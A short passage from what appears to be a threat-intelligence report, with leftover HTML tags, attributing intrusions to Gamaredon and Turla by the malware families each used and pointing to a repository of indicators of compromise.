In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.<\/p>\n

Turla<\/h4>\n
Equally, for Turla, we detected the usage of Kazuar v2 and Kazuar v3, which we imagine are unique to that group.<\/p>\n

IoCs<\/h2>\n
A complete checklist of indicators of compromise (IoCs) and samples may be present in our GitHub repository<\/a>.<\/p>\n